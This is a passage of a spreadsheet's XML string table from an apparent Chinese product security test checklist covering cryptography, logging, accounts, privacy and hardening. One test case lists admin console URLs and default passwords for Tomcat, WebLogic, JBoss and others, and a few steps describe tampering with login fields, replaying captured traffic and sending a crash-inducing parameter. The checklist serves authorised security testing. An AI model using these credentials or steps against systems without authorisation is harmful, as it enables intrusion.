2、登陆设备，看是否提供查看私钥内容的接口或命令。
3、如果私钥以文件形式存在，看是否可以查看文件内容，是否能够导出或下载私钥文件。
另外，私钥属于敏感信息，在系统中应该加密保存，并提供严格的访问控制机制。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、查看产品资料，看证书管理部分是否有证书及公私密钥对替换方法的说明和风险提示。
2、登陆设备，访问设备所使用的证书和密钥对，看是否有对应操作或命令，可以重新生成密钥对、申请证书，或导入证书和密钥对。
另外，私钥属于敏感信息，在系统中应该加密保存，并提供严格的访问控制机制。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、查看产品文档中的证书及密钥管理章节，检查私钥的存储方式是否按照PKCS标准加密存储。
（如果产品不支持基于口令的私钥存储机制，则直接跳到第4步）
2、登陆设备，尝试生成或导入密钥对功能，检查是否需要设定保护口令，且输入的口令是否有复杂度检查。
3、尝试修改私钥保护口令，检查修改时是否需要验证旧口令。
4、检查产品源码中涉及私钥生成、导入及存储的部分，分析上述验证的功能是否存在及使用正确性。
备注：开源或第三方软件实现的基于口令的加密私钥功能，其口令不强制要求复杂度检查。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、查找产品文档中根密钥的生成说明或产品源码中搜索根密钥生成代码，看根密钥是否硬编码在产品中。
2、根密钥如果采用初始向量和密钥材料的生成方法，则查看初始化向量和密钥材料是否直接硬编码在产品中。
备注：本用例可以结合对产品线人员访谈进行。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>目的和意义：
CBC模式的随机IV值确保相同的明文、相同的密钥加密出的密文完全不同，如果IV无法确保每次加密都不同，对于CBC模式，攻击者可以轻易的进行密文替换攻击；CBC模式之外的其他分组密码运算模式（如：OFB、CRT等），攻击者可以非常容易的解密密文。
CBC模式之外的其他分组密码运算模式（如：OFB、CRT等）的随机IV值用于抵抗密钥流重用（已知明文攻击的一种），防止攻击者解密密文。
子检查项：
1、IV是否是安全随机数
2、IV不能固定（如：写死在代码里）
3、禁止使用前一次加密的最后一个密文分组数据作为下一次加密的IV（这是针对TLS 1.0的BEAST攻击的根因）
4、IV不能写在配置文件里，且每次加密后都应更新
5、IV不能使用某些固定属性，如：某些ID</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、工具使用：
   1）使用CodeCC中的Fortify和Coverity，能扫出部分加密算法问题的代码；
   2）使用Nmap调用加密算法的套件，能扫出部分加密算法的问题；
2、人工代码走读：
   1）、3DES的密钥长度是否达到128bit
   2）、在3DES如果使用的192bit的密钥长度，则密钥的前64bit、中间64bit、后面64bit的数据禁止存在重复现象
   3）、3DES的三次密钥K1、K2、K3不能相等；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.Web业务运行正常
2.已知Web服务器版本信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.根据Web服务器的版本信息，通过搜索引擎查询其对应的控制台URL地址和默认的帐号、口令。以下列出一些常见的Web服务器控制台URL地址和默认帐号、口令：
Tomcat控制台URL：http://www.example.com/manager/html
Tomcat控制台默认帐号admin，默认密码tomcat或admin或空
Tomcat控制台默认帐号tomcat，默认密码tomcat
Jboss控制台URL：http://www.example.com/jmx-console/
Jboss控制台URL：http://www.example.com/Web-console/
Jboss控制台默认无须登陆，或者admin/admin
WebSphere控制台URL：http://www.example.com/ibm/console/logon.jsp
WebSphere默认帐号admin，默认密码admin
WebLogic控制台URL：http://www.example.com/console/ （一般console的端口为7001）
WebLogic默认帐号Weblogic，默认密码Weblogic
Apache控制台URL：http://www.example.com/server-status
Axis2控制台URL：http://www.example.com/axis2-admin/
Axis2控制台默认口令帐户：admin/axis2
iSAP控制台URL：http://www.example.com/admin/login.jsp
iSAP控制台默认的帐号和密码：admin/admin
Virgo控制台URL：http://www.example.com/admin
Virgo控制台默认的帐号和密码：admin/springsource
uniportal控制台URL：http://www.example.com/mc/zh/login.jsp
uniportal控制台默认的帐号和密码：admin/uniportal
Resin3.0控制台URL：http://www.example.com/admin_manage/
Resin3.1及更新版本的控制台URL：http://www.example.com/resin-admin/
（Resin的控制台应该限制只能本机访问，也就是只能从安装本resin服务器的机器上访问对应resin的控制台）
 “普元”管理控制台URL：http://www.example.com/eosmgr/
“普元”管理控制台默认的帐号和密码：sysadmin/000000
2.在浏览器地址栏中输入Web服务器对应的URL。由于不同的应用可能目录有所差异，如果访问不到，可以登陆后台服务器以find命令查找，比如find / -name “*console*”，find / -name “*admin*”，看看实际的URL应该是什么，再次尝试。
3.检查是否存在Web服务器控制台</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.采用Appscan扫描进行代码注释审核
  a.采用Appscan对Web应用进行扫描。
  b.分析扫描结果中代码注释部分的结果，并进行分析是否存在信息漏洞风险
2.采用手动进行代码注释审核
  a.使用search and replace扫描源代码（包含静态页面和动态页面），检查是否注释信息中包含物理路径、数据库连接、SQL 语句信息等敏感信息。
  b.使用search and replace扫描动态页面，使用关键字&lt;% // 、&lt;% /*、&lt;%// 、&lt;%/*、*/ %&gt;、*/%&gt;，确认是否存在信息漏洞风险</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.Web服务器运行正常
2.拥有Web服务器操作系统的帐号和口令
3.已知Web容器的部署，配置目录</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>目录权限设置为仅允许属主读、写、执行，可执行文件权限设置为仅允许属主读、执行，日志，配置等Web系统需要写的文件设置为仅允许属主读、写，其他文件仅允许属主读</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>block</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对于销往敏感市场的版本，人工分析&amp;访谈确认是否有提供采集最终用户原始通信内容（语音类、短信/彩信类、传真类、数据业务类）的功能。
A.原始通信内容通信：双方（只要其中一方涉及自然人）之间的实际通信内容，包括语音类、短信/彩信类、传真类、数据业务（如即时消息、Email、视频通信、网页浏览等）类等
b.在正常业务流程和标准协议之外，出于保障网络运营和服务的通用方式：debug日志/抓包时对码流解析并处理、未经客户同意的对通信内容的监控/录音/信令跟踪
c.对于符合业界标准或惯例的功能（如端口镜像、IP抓包、ACL traffic mirror），且产品本身不对抓取的数据进行解析和处理，允许保留。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、通过源代码分析，检查密钥生成的方式是否符合要求：没有将用户从键盘输入的值直接或间接作为加密密钥使用（如：使用用户从键盘输入的值和固定的字符串（如：全0、全1）连接后作为密钥使用）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>密码安全是基于密钥安全的， 密钥的损坏或丢失将造成密文信息无法解密，无法解密的密文信息即可认为数据被不可逆转的损坏，高价值或关键数据的损坏是应用系统无法接受的，所以必须为加密高价值和关键数据的密钥提供密钥的备份和恢复机制。
产品可根据实际业务场景或客户需求分析是否符合要求：
1、检查对需要备份的密钥是否设计和实现了密钥备份的功能，是否制定了密钥备份的规定。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、工具使用：
   1）使用CodeCC中的Fortify和Coverity，能扫出部分加密算法问题的代码；
   2）使用Nmap调用加密算法的套件，能扫出部分加密算法的问题；
2、人工代码走读：
   1）、使用Souce Insight搜索禁止使用的C标准库函数random()、rand()
   2）、使用Souce Insight搜索禁止使用Java的java.util.Random类
   3）、使用使用Souce Insight搜索java.security.SecureRandom()是否每次都设置了相同的种子，这将导致每次产生的随机数都一样
   4）、使用Souce Insight分析生成随机数长度是否超过24个字符（或192bits）
子检查项：
1、禁止使用C标准库函数random()、rand()生成随机数用于安全用途
2、禁止使用Java的java.util.Random类生成随机数用于安全用途
3、使用java.security.SecureRandom()产生随机数时，禁止每次都设置了相同的种子，这将导致每次产生的随机数都一样</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、工具使用：
   1）使用CodeCC中的Fortify和Coverity，能扫出部分加密算法问题的代码；
   2）使用Nmap调用加密算法的套件，能扫出部分加密算法的问题；
2、人工代码走读：
   1）、Openssl里的对称算法标识（如：EVP_aes_128_ecb()），禁止包含"ecb"字样
   2）、iPSI里的对称算法标识（如：ALGID_AES256_ECB()），禁止包含"ecb"字样
   3）、Java里Cipher.getInstance("AES")，其中"AES"默认是ECB模式，应禁止使用
   4）、Java里Cipher.getInstance("AES/ECB/NoPadding")，禁止包含"ecb"字样</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、工具使用：
   1）使用CodeCC中的Fortify和Coverity，能扫出部分加密算法问题的代码；
   2）使用Nmap调用加密算法的套件，能扫出部分加密算法的问题；
2、人工代码走读：
  1)、IV是否是安全随机数
  2)、IV不能固定（如：写死在代码里）
  3)、禁止使用前一次加密的最后一个密文分组数据作为下一次加密的IV（这是针对TLS 1.0的BEAST攻击的根因）
  4)、IV不能写在配置文件里，且每次加密后都应更新
  5)、IV不能使用某些固定属性，如：某些ID</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、工具使用：
   1）使用CodeCC中的Fortify和Coverity，能扫出部分加密算法问题的代码；
   2）使用Nmap调用加密算法的套件，能扫出部分加密算法的问题；
2、人工代码走读：
   1)、禁止在SSL/TLS里使用包含RC4的算法套件
   2)、在需要使用流加密的场景下是否使用AES的OFB和CTR模式替换（标准协议规定的除外，如：3GPP的A5算法除外）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、工具使用：
   1）使用CodeCC中的Fortify和Coverity，能扫出部分加密算法问题的代码；
   2）使用Nmap调用加密算法的套件，能扫出部分加密算法的问题；
2、人工代码走读：
   1)、Openssl调用RSA_generate_key函数生成密钥对时，第二个参数（公共指数）禁止设置为3
   2)、如果调用iPSI，开发人员是否参考了iPSI《Cryptography Developer Guide》提供的的官方例子，而不是将e设置成3</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>通过在源代码中进行关键字查找，是否满足以下要求
1.调用OpenSSL时不能指定RSA_PKCS1_PADDING为填充方式。
2.调用iPSI时不能指定RSA_PKCS1_PADDING为填充方式。
3.Java里Cipher.getInstance("XXX")，“XXX”里不能包含PKCS1字样。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.通过源代码分析，对使用非对称加密算法如RSA来保护机密数据的代码进行检视，检查是否使用私钥进行加密。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.通过源代码分析，在同一笔业务中，若既需要使用RSA加密又需要进行RSA签名，检查是否加密使用的公钥和签名使用的私钥来自同一个密钥对或同一个数字证书。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>使用DSA算法签名，当r等于0时签名可以被轻易地伪造，当s等于0时攻击者可以通过对算法逆向得到私钥，所以必须对DSA的签名结果进行检查以防止上述攻击。通过源代码分析，检查DSA算法使用时，用于签名的r和s两个大整数的值均不为0值：
1、如果使用iPSI执行DSA签名，有调用iPsiDsaSig_decode函数从签名结果中解析出r和s并判断它们值是否为0，当为0值时有重新生成r和s；
2、如果使用OpenSSL执行DSA签名，有调用d2i_DSA_SIG函数从签名结果中解析出r和s并判断它们是否为0，当为0值时有重新生成r和s；
3、如果使用JDK执行DSA签名，有使用第三方开源的Bouncy Castle中的ASN1Sequence类（或其它等效方法）从签名结果中解析出r和s并判断它们是否为0，当为0值时有重新生成r和s；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.通过源代码分析，检查密码算法函数调用次序，加密函数是否在签名函数的后面使用</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>二进制域椭圆曲线标量乘法实现不当，攻击者可能通过时间攻击从使用带二进制域ECDSA认证的OpenSSL的服务器中恢复出TLS私钥，出于安全性考虑，应该使用素数域ECDSA签名认证方式。通过在源代码中进行关键字搜索，检查是否使用了素数域ECDSA签名认证方式：
1、如果调用OpenSSL执行ECDSA运算，使用EC_GROUP_new_by_curve_name(int nid)函数指定椭圆曲线时,应将nid与Openssl源码ec_curve.c的curve_list[]全局变量对应的曲线进行匹配，确保curve_list的comment结构变量（字符串）中包含“prime field”字样。
2、如果调用JDK执行ECDSA运算，条件(ECPublicKey.getParams().getCurve().getField() instanceof ECFieldFp)必须为true
3、如果调用iPSI，请确认是否开启了__IPSI_NO_EC_POLY_CURVE__宏并在调用CRYPT_createECParamsById(SEC_UINT32 uiParamID)函数指定椭圆曲线时，咨询iPSI开发人员填写哪个数字才可以指定素数域（非二进制域）上的椭圆曲线。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RSA签名时采用PSS填充方式比PKCS1-V1.5填充具有更高的可证明安全性。检查RSA签名填充方式是否符合要求：
1、对于OpenSSL算法库，签名时应该先调用RSA_padding_add_PKCS1_PSS进行PSS填充，再对填充结果调用RSA_private_encrypt并指定RSA_NO_PADDING填充方式进行签名，验证签名时应该先调用RSA_public_decrypt进行公钥解密，再调用RSA_verify_PKCS1_PSS验证签名；
2、对于JDK，应该使用第三方开源的Bouncy Castle库提供的PSSParameterSpec类实现PSS填充方式的数字签名；
3、如果调用iPSI，则不满足此项要求，iPSI不支持PSS填充方式。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.通过源代码分析，检查在使用DH算法进行密钥协商的双方在接收到对方发送过来的“公钥”时，应判断公钥是不是0,1,p-1,p，这样的特殊值并要求重新发起密钥协商</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.通过源代码分析，检查使用HMAC算法保护数据完整性的代码，是否使用hash(key||message)方式作为MAC值的产生</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.通过源代码分析，检查加密运算和MAC运算的地方是否使用同一个对称密钥</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、利用系统提供的外部接口，比如soap接口，使用没有记录日志权限的用户登录，伪造向系统发送日志
2、使用具备记录日志权限的用户登录，向系统正常发送日志，观察系统的审计日志记录</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统有日志记录功能</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.系统正常运行
2.系统提供不同的应用服务</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.管理面所有操作指令都有记录日志；
2.日志内容必须包含：
? Where（执行动作的设备标识.发起请求的设备标识、IP地址或硬件地址）
? Who（本地应用的身份、请求者的身份）
? What（请求的动作、输出、结果代码、错误码、事务ID、应用/组件/服务/对象/方法、应用版本信息）
? When（UTC格式的时间戳）
注：日志不限于形式，文件或者数据库都可以。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查看SecureCat工具扫描报告，确认检查项7.3 Prevent X Server From Listening On Port 6000/tcp是否pass</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查看SecureCat工具扫描报告，确认检查项7.8 Set LILO/GRUB Password 是否pass</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.系统首次运行使用时或在资料中，检查是否提示客户更改初始密码、密钥等预验证属性信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.被测目标系统正常运行
2.系统初次使用、未更改初始状态</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查系统(预置)账户命名是否明确、功能清晰(如：root、oracle)，且都配置有密码</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.根据业界最佳实践，评估系统中是否有未使用的服务和软件，以尽量减少系统上的攻击媒介。
参考资料：
信息安全，第1版，2004年3月建议的行动， 
http://www.us-cert.gov/reading_room/CSG-small-business.pdf 
?IUP系统管理员的安全准则和最佳做法， 
http://www.iup.edu/tsc/security/; 
?安全工程意识，为系统工程师， 
http://www.software.org/pub/externalpapers/SecEngAwareness.doc</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登陆被测系统，进入命令行模式
2.针对产品发布的elf文件进行安全检查，执行如下命令：
if reade lf -s file 2&gt;/dev/null | grep -q '__stack_chk_fail';then echo "stack canary enabled"
if readelf -W -l file 2&gt;/dev/null | grep 'GNU_STACK' | grep -q 'RWE';then echo "NX enalbed"
查看命令中的编译选项是否呈enabled状态</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登陆被测系统，进入命令行模式
2.执行如下命令：
if /sbin/sysctl -a 2&gt;/dev/null | grep -q 'kernel.randomize_va_space = 1';then echo "ASLR enabled"
查看命令中的开关是否呈打开enabled状态</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登陆被测系统，进入命令行模式
2.执行如下命令：
lsof -i:端口  找到端口对应的进程ID
lsof -p PID号 找到该进程对应的工作目录下的所有文件
除.so文件外，遍历以上找到的所有文件，执行以下命令：
ll /绝对路径/文件名, 查看进程的数据文件的权限</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.打开被测系统的登录页面；
2.在登录界面中输入正确的帐号、口令信息，提交登录
3.在WEB代理工具中拦截的消息，如果有用户名密码验证码以外的字段，并尝试删除或修改该字段，检查是否影响服务器的认证；
检查认证信息是否能够被客户端关闭，例如，删除登录消息体中的“valid=server”或“valid=1”，则系统不再进行服务器端认证，则说明存在问题；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无法查询系统信息，或系统日志中无语法错误信息。URL中的非法参数无法作为PHP页面参数处理。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>服务器端对输入有做校验，防止过大文件或者字符串写入</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>业界标准 OWASP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.在数据传输过程中，使用Wireshark抓获HTTP消息。
2.TCPReplay工具使用Wireshark抓获的packets，重发packets，进行重放攻击。
3.查看是否发送成功</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.web中不存在基于标识符功能的页面。    2.如果存在该基于标识符访问的资源，要有合理的权限访问机制，标识符的生成需要具有随机性。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1系统是否存在删除超级用户的功能
2.如果可以删除超级用户查看是否可以添加超级用户</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、用于调试和测试目的的帐号在发布前是否已删除
2、系统安装、初始化配置过程中使用到的临时帐号是否自动删除或者提供手工删除的指导书</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对于仅支持本地接入的某些输入受限设备（如银行ATM机）不强制要求口令复杂度检查，其他情况必须满足如下要求： 
1、缺省口令必是否满足复杂度要求
2、IPSec、SSL、SNMP预共享密钥缺省值是否进行复杂度检查
3、SNMP v1、v2 读/写团体字是否满足口令复杂度要求
4、新建和修改口令时是否检测口令复杂度
5、口令复杂度是否在服务器端检测
6、用户输入口令是否满足口令复杂度要求
7、是否缺省打开口令复杂度检查功能
8、是否使用C标准库函数random()、rand()生成随机数用于安全用途
9、是否使用Java的java.util.Random类生成随机数用于安全用途
10、系统自动生成的口令长度是否至少为6个字节</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、对于管理面人机登录的场景，是否有“自动登录”、“记住我”、“记住密码”等功能</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、B/S 应用中，是否只允许使用cookie方式维持会话，其他方式均不可以使用</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>产品新版本中是否缺省使用推荐的强密码算法。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>问题1（致命）：USB升级模块使用MD5不安全的加密算法校验升级包。输入用MD5是不适合的，黑客可以对软件包进行篡改，但对应的MD5值还是同一个。
问题2（致命）：对IMSI/IMEI加密使用了DES不安全加密算法加密。
问题3（严重）：WEB本地证书签名过程中使用了sha1不安全算法。
HCSEC-1039-1008 The length of the auto-generated RSA public/private key pair used by the SSH server is 512 bits, which is insufficient to provide adequate protection against modern key breaking algorithms. The minimum/default should be 2048 bits</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、产品或服务不允许收集隐私声明中没有列出的个人数据，不允许将个人数据用于没有声明的目的
2、个人数据的采集范围、使用目必须与隐私声明中的描述保持一致</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、敏感个人数据禁止明文存储在系统日志文件、代码、Cookie中（存储类软硬件产品除外，如硬盘，数据库等）
2、操作人员访问个人数据之前须对其身份及权限进行验证
3、产品对于个人数据的访问控制策略须满足不同职位职能的权限要求，并可以取消操作人员的访问权限
4、数据主体的银行卡号在存储前须采用安全加密机制进行加密，禁止存储CVV2
5、（可选）具有个人数据导出功能的产品，导出时应提醒操作人员导出的数据中包含个人数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、识别出业务的用户数据删除场景；
2、结合后台数据库检查用户数据信息进行了物理删除；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、对于数据控制者和处理者，必须根据个人数据的使用目的以及法律要求给个人数据定义存留期
2、对于数据控制者和处理者，超过存留期后，必须提供机制或是指导来删除或匿名化个人数据
3、对于数据控制者和处理者，产品运行期间临时产生的包含个人数据的文件，产品运行结束后必须自动删除或匿名化其中的个人数据
4、WIFI直连应用中，导入联系人时不得将联系人信息明文永久暴露在SD卡存储区</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、版本发布前，软件包、升级包、补丁包必须经过完整性验证
2、使用InfoCollector工具上传文件时，必须对文件进行完整性校验
常见问题：
1、软件完整性校验的执行开关在“解释型”脚本文件里，攻击者可以通过篡改安装脚本绕过软件完整性校验</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、不允许使用公开的用于调试目的的私钥（如：Android Debug签名私钥）对软件进行签名
2.对华为开发的软件进行完整性签名时，必须使用华为颁发的代码签名证书对应的私钥进行签名
3、若使用第三方私钥对软件应用进行签名，须确认该私钥的来源是可信的，如来自业界可信的CA中心（veriSign）或公司（如微软等）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、禁止将根证书以证书文件的形式随发布包一起发布，这样无法防止攻击者篡改根证书文件
推荐的根证书保护方式如下：
1) 将根证书的Hash值存放在TPM芯片里
2) 将根证书硬编码到代码里
3) 将根证书的Hash值写入OTP芯片
4) 将根证书或其Hash值存放到只读BootROM或BIOS里</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、错误提示中禁止包含密码、Session ID、用户信息，程序运行环境等敏感信息
2、URL中禁止存放Session ID、Token等敏感信息
3、日志文件中禁止包含密码、密钥、银行账号、用户名等敏感信息
4、调试信息中禁止包含密码、密钥等敏感信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、禁止对外暴露可以访问包含敏感信息（如备忘录内容、日历存储内容等）的接口
2、禁止出于保障网络运营和服务目的提供采集最终用户原始通信内容（语音类、短信/彩信类、传真类、数据业务类）的功能，如录音、抓包，必须通过版本的形式去除（如编译宏、模块化加载，不允许采用License控制）。
3、产品禁止存在可修改任意用户口令的工具
4、产品禁止存在对包含敏感数据的文件（如包含密钥的配置文件、数据库）进行解密的自研工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、WIFI直连建立后，若WLAN的安全类型默认为WPA/WPA2-PSK模式，则当用户使用过时的安全协议（如wep）时，需要在显示界面或CPI资料提示风险
2、在应用程序中，配置不安全算法时应在显示界面或CPI资料提示安全风险
3、在应用程序中，开启ftp或telnet服务时应在显示界面或CPI资料给出风险提示</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、操作发生的时间、用户ID(如关联终端、端口、网络地址或通信设备等）、事件类型、被访问的资源名称、操作的结果须记录日志
2、操作过程须支持可追溯
3、（可选）操作目的应记录日志</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、不使用的物理接口需移除，满足如下条件：
   a、移除不使用的硬件接口的驱动程序；
   b、移除设备上不使用的USB插座；
2、需要保留使用的物理接口（如串口、USB接口、管理网口等）应具备接入认证机制，以防止非授权访问，相关接入认证机制应缺省启用（本地BIOS不强制）。
3、需保留使用的物理接口暂无认证机制，可暂时使用类似选焊电阻跳线方式进行初级保护，但必须满足以下几点：
   a、使用物理手段覆盖不使用的USB接口的Pin脚；
   b、禁止通过工具（如：JTAG Studio）直接使用JTAG接口或排针；
   c、禁止在PCB板上保留了用于焊接调试接口（如：JTAG口）的丝印；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、产品实现至少包含一种预防反射攻击的方法。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、系统不支持none认证方式或无法通过任何方式新增none认证。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、系统管理员拥有以下能力：
（1）只能创建帐户名、设置密码和对该帐户的描述，不能对该帐户授权，新创建的帐户，默认处于被锁定的状态。
（2）系统管理员还有“删除帐号”的能力。
（3）系统管理员帐户可以在帐户管理页面看到所有当前的所有帐户，他可以重置除系统管理员、安全管理员和安全审计员这三个系统默认初始帐户外的任何一个帐户的密码，但是重置密码后，被重置密码的帐户会被锁定，只能让安全管理员解锁。而默认的sysadmin、secadmin、secauditor三个帐户的密码不能被系统管理员重置，只能由这三个帐户自己通过修改密码的方式修改。
（4）系统管理员有业务管理和告警管理的权限。不具备角色管理和密码策略管理的能力。
2、安全管理员拥有以下能力：
（1）安全管理员不能创建帐户，仅能在系统管理员已创建帐户的基础上，通过“修改帐户属性”的方式给该帐户授予角色/权限，给该帐户授权后，点击“保存”按钮后，默认给该授予权限后的帐户解锁。不允许给未授予任何权限的帐户解锁。
（2）安全管理员可以拥有权限管理中的“角色管理”的权限。
（3）如果某个帐户被锁定，例如系统管理员给某个帐户重置密码后，只能由安全管理员来给该帐户解锁。
（4）安全管理员不能重置任何帐户的密码（只能由系统管理员重置密码）。
（5）安全管理员只具备查看操作日志的能力，不具备导出日志的能力。
（6）安全管理员不需要告警管理的权限。
（7）密码策略管理由安全管理员负责。
3、安全审计员拥有系统所有的日志查看和日志导出的能力。
4、新建的角色应只能拥有系统管理员、安全管理员和安全审计员三个角色中某一个角色的部分或全部权限。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查看操作员帐号数据，设置账号试用期，使该帐号过有效期，然后再尝试以该用户登录，检查用户是否可登陆。
2.查看操作员帐号数据，设置账号试用期，使该帐号未生效，然后再尝试以该用户登录，检查用户是否可登陆。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、使用管理员账号登陆系统。
2、查看当前在线用户信息，看是否有记录在线用户的用户名、用户类型、用户ip地址、登陆时间等信息。
3、查看管理员是否有强制在线用户下线功能，如果有，尝试将不同的用户踢下线，看是否操作成功。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.找出所有访问目标文件及文件夹的用户并确定用户权限级别。
2.最高级别用户为目标文件夹及文件的属主，具备可读、可写、可执行权限。
3.最高级别用户组其他用户对目标文件夹及文件具备可读、可执行权限。
4.其他级别用户对目标文件夹及文件最多具备可读、可执行权限。
5.其他用户对目标文件夹及文件不具备任何权限。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、检查设备或应用系统的设计文档，查看是否提供防篡改的功能特性或是否提供日志记录的功能记录篡改的事件。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>开启的服务都是必须的不是默认安装开启的。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、检查默认安装说明书，查看默认安装时都安装了什么服务，并且检查不常用的或不需要的服务。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.访谈开发设计对加密的处理</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>涉及敏感数据显示的Web页面的源代码中按要求包含禁止页面缓存的代码。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>URL携带了随机数。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>分析系统中会涉及到现实敏感数据的Web页面，作为检查对象。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.日志的删除操作满足安全要求</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>经过分析以后的结果中，业务系统不存在不需要对外开放的敏感接口，或者该接口进行了完善的权限控制。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.GET请求页面/pages/和/noteaction.cgi?noteId=%，查看目标系统响应
提交参数值为%可能导致服务出错并停止运行</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查应用程序是否可以无需认证或简单账号认证通过RSH连接得到SHELL。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
